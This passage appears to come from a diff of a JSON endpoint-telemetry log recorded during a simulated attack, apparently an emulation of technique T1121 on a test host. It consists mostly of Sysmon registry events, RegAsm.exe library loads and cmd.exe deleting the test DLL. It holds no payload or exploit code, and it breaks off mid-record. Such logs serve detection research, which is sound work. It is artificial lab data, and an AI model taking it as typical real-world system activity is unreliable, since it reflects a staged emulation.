"registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mscoreei.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"del T1121.dll\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3428, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570869070000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - 
"pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "process", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5836, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570869260000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - 
"event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clr.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869180000, - "unique_pid": 